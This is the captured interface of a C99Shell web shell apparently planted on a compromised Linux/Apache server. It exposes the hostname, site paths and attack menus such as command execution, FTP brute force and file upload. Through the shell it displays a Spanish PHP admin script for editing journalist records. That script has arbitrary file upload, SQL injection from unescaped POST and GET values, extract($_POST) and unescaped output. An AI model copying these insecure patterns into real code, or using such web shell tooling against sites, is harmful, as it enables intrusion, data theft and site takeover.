!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.3.29 

uname -a: Linux tardis23.nocplanet.net 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024
x86_64
 

 

Safe-mode: OFF (not secure)

/home/memoriacel/public_html/2018/panel/   drwxr-xr-x
Free 985.27 GB of 1859.98 GB (52.97%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     modificar-periodista.php (2.72 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
$pagina_actual
="administrar-periodistas";
$categoria_actual="periodistas";
require_once(
"includes/config.php");
require_once(
"includes/funciones.php");

if (isset(
$_POST["id"])){
    
    
extract($_POSTEXTR_SKIP);
    
    
$nombre_archivo_foto=$foto_actual;
    if (isset(
$_FILES["foto"])){
        
$archivo=$_FILES["foto"];            
        if (
$archivo["tmp_name"]!=""){
            
            
//elimino fotos anteriories
            
if (file_exists($carpeta_periodistas_original.$foto_actual)){
                
unlink($carpeta_periodistas_original.$foto_actual);
            }
            
            
$timestamp=time();
            
$trozos explode("."$archivo["name"]); 
            
$extension end($trozos); 
            
//generar_imagen($archivo["tmp_name"], $ancho_veterinario_original, $alto_veterinario_original, $carpeta_veterinario_original.$timestamp.'.'.$extension);
            //generar_imagen($archivo["tmp_name"], $ancho_thumb_rotador_productos_original, $alto_thumb_rotador_productos_original, $carpeta_rotador_productos_thumb.$timestamp.'.'.$extension);
            
$nombre_archivo_foto=$timestamp.'.'.$extension;
            
copy($archivo["tmp_name"],$carpeta_periodistas_original.$nombre_archivo_foto);
        }
    }
    
    
$result=$mysqli->query("
    UPDATE periodista SET 
    nombre='"
.utf8_decode($nombre)."', 
    foto='"
.($nombre_archivo_foto)."'
    WHERE id='
$id'
    "
);        
    
header('Location: administrar-periodistas.php?exito=si');
}

if (isset(
$_GET["id"])){
    
$id=cadena_segura($_GET["id"],11);
    
    
$result=$mysqli->query("
    SELECT id, nombre, foto
    FROM periodista
    WHERE id='
$id'
    "
);
    
$item mysqli_fetch_assoc($result);

?>
<div class="modal-content">
    <form method="post" action="modificar-periodista.php" enctype="multipart/form-data">
    <input type="hidden" name="id" value="<?=$id?>">
    <input type="hidden" name="foto_actual" value="<?=$item["foto"]?>">
    <div class="modal-header">
        <button type="button" class="close" data-dismiss="modal">&times;</button>
        <h4 class="modal-title"></h4>
    </div>
    <div class="modal-body">
        
        <div class="form-group">
            <label>Nombre</label>
            <input class="form-control" name="nombre" value="<?=utf8_encode($item["nombre"])?>" required>
        </div>   

        <div class="form-group">
            <label>Foto actual</label>
            <img src="<?=$carpeta_periodistas_original.$item["foto"]?>" width="45"/>
        </div> 

        <div class="form-group">
            <label>Nueva foto <?=$ancho_periodistas_original?> x <?=$alto_periodistas_original?> px</label>
            <input type="file" class="form-control" name="foto" >
        </div>  

    </div>
    <div class="modal-footer">
        <a href="#" class="btn btn-white" data-dismiss="modal">Cerrar</a>
        <input type="submit" class="btn btn-primary" value="Modificar">
    </div>
    </form>
</div><!-- /.modal-content -->
<? }?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.3397 ]--